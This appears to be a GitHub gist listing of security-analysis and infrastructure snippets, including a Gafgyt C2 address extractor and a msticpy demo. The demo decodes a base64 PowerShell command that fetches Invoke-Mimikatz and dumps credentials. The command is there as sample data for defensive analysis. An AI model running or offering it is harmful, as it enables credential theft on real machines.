This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Gafgyt/qbot C2 extractor | |
#https://bazaar.abuse.ch/browse/signature/Gafgyt/ | |
#The file needs to be unpacked (usually packed with upx) | |
import re | |
import sys | |
# regex from https://www.oreilly.com/library/view/regular-expressions-cookbook/9780596802837/ch07s16.html | |
ipv4_zero = b"\x00(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?):(\d{0,5})\x00" | |
ipv4_e9 = b"\xe9(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?):(\d{0,5})\x00" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from msticpy.nbtools import * | |
from msticpy.sectools import * | |
command = "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwA7AA==" | |
out = base64.unpack(command) | |
print(out[1]['decoded_string'][0]) | |
# it should print |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
In [1]: from pyspark.sql import SparkSession | |
In [2]: spark = SparkSession \ | |
...: .builder \ | |
...: .appName("example") \ | |
...: .getOrCreate() | |
22/04/29 18:55:18 WARN Utils: Your hostname, ubuntu resolves to a loopback address: 127.0.1.1; using 192.168.95.155 instead (on interface ens33) | |
22/04/29 18:55:18 WARN Utils: Set SPARK_LOCAL_IP if you need to bind to another address | |
Using Spark's default log4j profile: org/apache/spark/log4j-defaults.properties | |
Setting default log level to "WARN". |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from graphviz import Digraph | |
process_data = [] | |
process_data.append({"pid":"1", "ppid":"204", "path":"c:/cmd.exe"}) | |
process_data.append({"pid":"4", "ppid":"204", "path":"c:/powershell.exe"}) | |
process_data.append({"pid":"204", "ppid":"0", "path":"c:/svhost.exe"}) | |
process_data.append({"pid":"8", "ppid":"4", "path":"c:/net.exe"}) | |
process_data.append({"pid":"10", "ppid":"4", "path":"c:/netsh.exe"}) | |
def graph_process(jsonarray, pid_key, ppid_key, label_key): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
name: build and upload container | |
on: | |
push: | |
branches: [ main ] | |
jobs: | |
build: | |
runs-on: ubuntu-latest |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
from time import sleep | |
while True: | |
try: | |
if requests.get("http://localhost:8080").status_code == 200: | |
break | |
else: | |
sleep(5) | |
except: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#taken from here: https://github.com/immauss/openvas/blob/master/compose/docker-compose.yml | |
#as of jan 9th 2022, it works fine. takes some time to download feeds initially. | |
version: "3" | |
services: | |
openvas: | |
ports: | |
- "8080:9392" | |
environment: | |
- "PASSWORD=admin" | |
- "USERNAME=admin" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from flask import request | |
from flask import Flask | |
import opsgenie_sdk | |
app = Flask(__name__) | |
og = opsgenie_sdk.configuration.Configuration() | |
og.api_key['Authorization'] = "" | |
og.api_client = opsgenie_sdk.api_client.ApiClient(configuration=og) | |
og.alert_api = opsgenie_sdk.AlertApi(api_client=og.api_client) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# root@host:~# cat /etc/netplan/01-netcfg.yaml | |
network: | |
version: 2 | |
renderer: networkd | |
ethernets: | |
eth0: | |
dhcp4: yes | |
eth1: | |
dhcp4: no | |
eth2: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
version: '2' | |
services: | |
elasticsearch: | |
image: 'elasticsearch:7.11.1' | |
environment: | |
- http.host=0.0.0.0 | |
- discovery.type=single-node | |
- script.allowed_types=inline | |
- thread_pool.search.queue_size=100000 | |
- thread_pool.write.queue_size=10000 |